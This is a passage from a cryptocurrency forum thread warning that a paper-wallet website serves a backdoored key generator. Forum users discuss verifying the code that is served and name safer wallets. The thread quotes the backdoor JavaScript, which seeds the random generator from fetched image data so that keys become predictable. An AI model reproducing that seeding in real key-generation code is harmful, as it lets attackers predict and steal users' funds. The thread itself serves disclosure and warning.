Vulnerability discovered on bitcoinpaperwallet[.]com - DO NOT USE IT - page 2.

jseverson

hero member

Activity: 1834

Merit: 759

Quote from: Chivas Regal on May 17, 2020, 08:23:44 PM

Hopefully they are the exception to the rule?

I have been using https://segwitaddress.org/ for newer "number three" wallet addresses and before that https://www.bitaddress.org/ for the older 'number one" addresses. I can't recall hearing that they are also infected - can anyone confirm they are ok?

It seems like both of those are safe for now, as I couldn't find any legitimate scam accusations. Considering this is an incredibly high stake scenario though, when in doubt, it's best to simply go for the more reputable options. As others have pointed out, Bitcoin Core and Electrum are popular, and therefore more scrutinized, making them safer to trust for people who can't review code by themselves.

Chivas Regal

member

Activity: 88

Merit: 13

Cheers!

Hopefully they are the exception to the rule?

I have been using https://segwitaddress.org/ for newer "number three" wallet addresses and before that https://www.bitaddress.org/ for the older 'number one" addresses. I can't recall hearing that they are also infected - can anyone confirm they are ok?

hugeblack

legendary

Activity: 2702

Merit: 4002

Quote from: OcTradism on May 17, 2020, 09:14:09 AM

Nice finding but I still don't catch the reason why people easily accept wallet generator from third-party while they can do that with Bitcoin Core or Electrum (creating wallet offline). After that, print or write private keys or mnemonic seeds on paper. It is safer and not too hard to do.

I can think of two logical reasons:

- They believe that it is the same as Bitcoin Core or Electrum security because it is open source and addresses can be generated offline.
- Attractive and elegant designs that are suitable for gifts, and are easy to print.

Quote from: hatshepsut93 on May 17, 2020, 09:24:55 AM

there's hundreds of independent users who check the changes and have enough skill and familiarity with the codebase to do so.

I agree with you, the relative security that many users feel that the wallet is open source or running it offline makes them trust them without reviewing the code.
Unfortunately, the random generation function can produce predictable private keys.

BTW: Here's a python code that generates such predictable addresses:

Code:

#!/usr/bin/env python3
# [repo]    github.com/brianddk/reddit/blob/master/python/bad_address.py
# [req]     pip3 install pycoin mnemonic

from mnemonic import Mnemonic
from pycoin.symbols.btc import network as btc

code = ("abandon abandon abandon abandon abandon abandon" + 
        " abandon abandon abandon abandon abandon about")
path = '44H/0H/0H/0/0'
mnemo = Mnemonic("english")

one_privkey = btc.parse.secret_exponent(1).address()
zero_hash   = btc.address.for_p2pkh(bytes([0]*20))
zero_bip39  = btc.keys.bip32_seed(mnemo.to_seed(code)
                ).subkey_for_path(path).address()

print(one_privkey, zero_bip39, zero_hash)

Quote from: btc_angela on May 17, 2020, 05:24:14 PM

This is not new I supposed, because it was reported last year already:

The above article talks about bitcoinpaperwallet[.]com and not WalletGeneratorDOTnet, although I think both sites are run by the same scammer.

btc_angela

hero member

Activity: 2660

Merit: 551

This is not new I supposed, because it was reported last year already:

[1] Disclosure: Key generation vulnerability found on WalletGenerator.net

[2] Disclosure: Key generation vulnerability found on WalletGenerator.net—potentiall

khaled0111

legendary

Activity: 2702

Merit: 3045

Top Crypto Casino

Quote from: OcTradism on May 17, 2020, 09:14:09 AM

Nice finding but I still don't catch the reason why people easily accept wallet generator from third-party while they can do that with Bitcoin Core or Electrum (creating wallet offline).

Not everyone can afford to run bitcoin core and isn't Electrum, in one way or another, a third-party software!
You are missing the point here which is "don't trust, verify".
It doesn't matter whether you use it online or offline if you do not verify its code and know how things work under the hood.

hatshepsut93

legendary

Activity: 3024

Merit: 2148

Browser-based software is inherently less safe, because each time you open the site is like installing a program anew. This can make it harder to audit, because a server can selectively serve malicious code.

Quote from: hugeblack on May 17, 2020, 08:59:58 AM

In brief:

- Being open-source, code on GitHub, runs offline, does not mean that you are safe.

This is why it's important to use open source software that has the most users, it increases chances of catching malicious modifications early. When Core or Electrum releases new version, there's hundreds of independent users who check the changes and have enough skill and familiarity with the codebase to do so.

OcTradism

hero member

Activity: 1722

Merit: 801

Nice finding but I still don't catch the reason why people easily accept wallet generator from third-party while they can do that with Bitcoin Core or Electrum (creating wallet offline). After that, print or write private keys or mnemonic seeds on paper. It is safer and not too hard to do.

hugeblack

legendary

Activity: 2702

Merit: 4002

In brief:

- Being open-source, code on GitHub, runs offline, does not mean that you are safe.
- If you have not read every line in Khaled, and the code on the site matches Khaled, then you are not safe.
- Ensure that code being served via the URL match the code on GitHub.
- Don’t trust, Verify.

Warning: bitcoinpaperwallet[Dot]com/walletgenerator[Dot]net have a backdoor that leaves you at risk of your funds being stolen.

there have been changes in the code being served via the bitcoinpaperwallet[.]com did not match the code on GitHub and thus duplicate keypairs being provided to users(potentially making the keys generated non-random or producible.)

Quote from: https://medium.com/mycrypto/disclosure-key-generation-vulnerability-found-on-walletgenerator-net-potentially-malicious-3d8936485961

When generating a key, you take a super-random number, turn it into the private key, and turn that into the public key / address. However, if the “super-random” number is always “5,” the private key that is generated will always be the same. This is why it’s so important that the super-random number is actually random…not “5.”

Code:

  var base64 = "data:image/png;base64," + btoa([].reduce.call(new Uint8Array(this.response),function(p,c){return p+String.fromCharCode(c)},''));
                for(var i = 0; i < base64.length; i++)
                {
                    if(i+3 < base64.length)
                    {
                        if(base64.charCodeAt(i) != 0 && base64.charCodeAt(i+1) != 0 && base64.charCodeAt(i+2) != 0 && base64.charCodeAt(i) != 1 && base64.charCodeAt(i+1) != 1 && base64.charCodeAt(i+2) != 1)
                        {
                            SecureRandom.seedInt((base64.charCodeAt(i) * base64.charCodeAt(i+1) * base64.charCodeAt(i+2))*(i+1));
                        }
                    }
                }
                SecureRandom.loaded = 1;
            };

Source ----> https://bitcointalksearch.org/topic/m.54444963

Read more ----> https://twitter.com/MyCrypto/status/1261830475003252736

Topic: Vulnerability discovered on bitcoinpaperwallet[.]com - DO NOT USE IT - page 2. (Read 552 times)